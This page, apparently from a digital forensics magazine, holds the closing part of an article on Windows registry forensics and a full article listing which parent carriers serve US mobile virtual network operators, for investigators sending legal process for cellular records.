Registry hive files are allocated in 4096-byte blocks starting with a header, or base block, and continuing with a series of hive bin blocks. Each hive bin (HBIN) is typically 4096 bytes [5].  

Issues in Registry Analysis

There are few main issues that investigators have to face when analyzing registry files.

• Data Completeness – The amount of information required for the investigation will depend on the type of the investigation. Some investigations require more information than others. Because of this, investigators should ensure that all the data is present and complete. If this is not the case, the investigation may take extra time to complete and therefore be more costly. Missing Data – Missing data reduces the accuracy of the investigation. Missing data can be sorted into three categories of randomness [8]:

• Missing completely at random (MCAR)
• Missing at random (MAR)
• Missing not at random (MNAR)

• Extracting Data – At present there is no technique to view registry files in real time. With the currently available technology, investigators can only take an image of a registry file. The disadvantage of this is investigators cannot collect further information after they have captured the registry file. 
• Lack of Knowledge About Keys – Registry files store data with a unique key. Some investigators do not know all the keys which are stored in the registry files. This can lead to missing a lot of information. There are also some instances in which it is not possible to find out about certain keys and stored information.
• Registry File Format – Registry files are stored in the “C:drive/windows/system32/config/” file path and they must be ripped and converted into a readable format before being used in an investigation.

References

1. Vacca, J. (2005). Computer Forensics: Computer Crime Scene Investigation. 2nd ed.
2. Carvey, H. (2011). Windows Registry Forensics. Burlington: Elsevier Science.
3. AccessData. (2019). FTK Imager. [online]. Available at: https://accessdata.com/product-download/ftk-imager-version-4.2.0. [Accessed 20 March 2019].
4. Guidence Software. (2019). Encase Forensics. [online]. Available at: https://www.guidancesoftware.com/encase-forensic. [Accessed 21 March 2019].
5. D. Morgan, T. (2008). Recovering deleted data from the Windows registry. Science Direct, [online] pp.S35, S36. Available at: http://www.sciencedirect.com [Accessed 20 March 2019].
6. Help.comodo.com. (2019). Windows Registry – Overview, Structure, Benefits, Registry Cleaner| Cloud Scanner Version 2.0. [online] Available at: https://help.comodo.com/topic-73-1-147-845-.html [Accessed 23 March 2019].
7. Msdn.microsoft.com. (2019). Registry Hives (Windows). [online] Available at: https://msdn.microsoft.com/en-us/library/windows/desktop/ms724877(v=vs.85).aspx [Accessed 20 March 2019].
8. Gliklich, R., Dreyer, N. and Leavy, M. (2014). Analysis, Interpretation, and Reporting of Registry Data To Evaluate Outcomes. Agency for Healthcare Research and Quality (US). [online] Available at: http://www.ncbi.nlm.nih.gov/books/NBK208602/ [Accessed 20 March 2019].
9. Yang.S, et.la. (2013). A Method on Extracting Registry Information from Windows CE Memory Images. [online]. Available at: https://ieeexplore.ieee.org/document/6835701. [Accessed 25 March 2019].
10. Zhang.S, Wang.L, Zhang.L. (2011). Extracting windows registry information from physical memory. [online]. Available at: https://ieeexplore.ieee.org/document/5764089. [Accessed 25 March 2019].

About The Author

Chirath De Alwis is an information security professional with more than four years’ experience in Information Security domain. He holds BEng (Hons), PGdip and eight professional certifications in cyber security and also reading for his MSc specializing in Cyber Security. Currently, Chirath is involved in vulnerability management, Threat Intelligence, incident handling and digital forensics activities in Sri Lankan cyberspace. You can contact him on chirathdealwis@gmail.com.

by Patrick Siewart 

Increasingly, cellular records and their associated location information are being used in civil litigation, where previously they were considered to be a “law enforcement only” tool.  But in the age when users carry at least one smartphone with them at all times, the location data with regard to calls / texts / data usage can be crucial evidence in certain cases. These include insurance fraud investigations, domestic / custody / cohabitation matters and personal injury cases.

As we’ve detailed in previous articles, there are five main US-based cellular carriers:  Verizon Wireless, AT&T, Sprint, T-Mobile & U.S. Cellular. But what about those not on the list of five?  What about Boost or Straight Talk or Virgin Mobile or Cricket or Tracfone or… the list goes on and on. Well, these carriers are all what are known as mobile virtual network operators or MVNOs.  Check out our article detailing the record retention periods for each provider.

Essentially how MVNOs operate is by “leasing” the use of one of the five main cellular carriers, or sometimes more than one, to increase subscribership and allow of use of multiple devices on their plans, many of which are pre-paid or pay-as-you-go. Some MVNOs operate on strictly CDMA or GSM networks and some operate on both. Some MVNOs may be nationwide and some may be regional, as was the circumstance we dealt with recently regarding an MVNO that was based in the Tennessee Valley. The fact is, MVNOs far outnumber their host-networks in sheer numbers.

The first step is to determine which carrier the target of your investigation subscribes to, or which carrier owns the service for that number.  For this, the simplest resource is the Hawk Analytics Support site, which is free with a registration. The support site also has articles, sample wording for process, best practice documentation and more.

When you identify the carrier you need to submit legal process to is an MVNO, one of several things may happen upon submission, depending on what type of information you’re seeking and with which MVNO the account you’re interested in is associated.  For example, Boost or Virgin Mobile will refer you to Sprint’s legal compliance center for all types of requests, but Tracfone will not provide records for cell site listing and GPS location information.  Those requests will be referred to the parent network.  It really just depends on the MVNO you’re dealing with.  Remember, even if the account is a pre-paid “drop/burner phone” and the subscriber didn’t have to give a name or ID when initiating the account, there can still be great investigative data contained in the records.

And remember, only Verizon Wireless stores standard text message (SMS) content for a minimum of 3 and a maximum of 10 days.  After that, the information is purged.

As a quick reference, compiled a list of major MVNOs that you may run across in your investigations. All of the addresses for service of legal process to the respective MVNOs may be found on the ISP listing under the “Resources” tab on search.org.

Verizon Wireless-Only MVNOs

• Xfinity Mobile (Comcast)
• Affinity Cellular
• Spectrum Mobile
• Total Wireless
• GreatCall

AT&T-Only MVNOs

• Black Wireless
• Cricket Wireless
• EasyGO Wireless
• FreeUP Mobile
• Jolt Mobile
• Pure Talk USA
• RuraLTE
• ZillaTalk

Sprint-Only MVNOs

• Boost Mobile
• Chit Chat Mobile
• Kroger i-wireless
• Patriot Mobile
• Ready Mobile
• Tello US
• Scratch Wireless
• Virgin Mobile USA

T-Mobile-Only MVNOs

• China Telecom Americas (CTExcel)
• GoSmart Mobile
• KidsConnect
• Liberty Wireless
• Mint Mobile
• Roam Mobility
• SeaWolf Wireless
• Simple Mobile
• Ultra Mobile
• Value Wireless
• Walmart Family Mobile

As previously stated, some MVNOs use multiple networks for their service.  Which network is utilized can depend on where the device is purchased (i.e, Walmart, Target, etc.) and/or what type of device is selected for use.  This naturally allows for the MVNO to cast a wider net and attract more customers, but it can make things confusing for investigators who are trying to figure out where to submit legal process.  Here are some of the more common cross-carrier MVNOs:

• FreedomPop:  AT&T, Sprint
• Consumer Cellular:  AT&T, T-Mobile (GSM)
• Republic Wireless:  Sprint, T-Mobile
• Flash Wireless:  Sprint, Verizon
• Expo Mobile:  Sprint, Verizon
• EcoMobile:  Sprint, T-Mobile, Verizon
• Red Stick Wireless:  Sprint, T-Mobile, Verizon
• Best Cellular:  AT&T, Sprint, T-Mobile, Verizon
• Red Pocket Mobile:  AT&T, Sprint, T-Mobile, Verizon
• Straight Talk:  AT&T, Sprint, T-Mobile, Verizon
• Net10 Wireless:  AT&T, Sprint, T-Mobile, Verizon, US Cellular
• Boom Mobile:  AT&T, Sprint, Verizon
• TracFone:  AT&T, Sprint, T-Mobile, Verizon, US Cellular (feature phones only)
• Google Fi:  Sprint, T-Mobile, US Cellular

A complete and up-to-date list of MVNOs, their networks and some features about the available plans can be found at this Wikipedia page.

Wrapping It Up

MVNOs are a fact of life when looking to use cellular location data conducting investigations.  By arming yourself with the knowledge of which MVNO operates on which parent network and which information is available from whom, you can save valuable time, money and heartache.  Happy hunting!

About The Author

Patrick Siewert is the Principal Consultant of Pro Digital Forensic Consulting, based in Richmond, Virginia.  In 15 years of law enforcement, he investigated hundreds of high-tech crimes, incorporating digital forensics into the investigations, and was responsible for investigating some of the highest jury and plea bargain child exploitation investigations in Virginia court history. Patrick is a graduate of SCERS, BCERT, the Reid School of Interview & Interrogation and multiple online investigation schools (among others). He is a Cellebrite Certified Operator and Physical Analyst as well as certified in cellular call detail analysis and mapping. He continues to hone his digital forensic expertise in the private sector while growing his consulting & investigation business marketed toward litigators, professional investigators and corporations, while keeping in touch with the public safety community as a Law Enforcement Instructor.

Email:  Inquiries@ProDigital4n6.com
Web: www.ProDigital4n6.com
LinkedIn
Twitter: @ProDigital4n6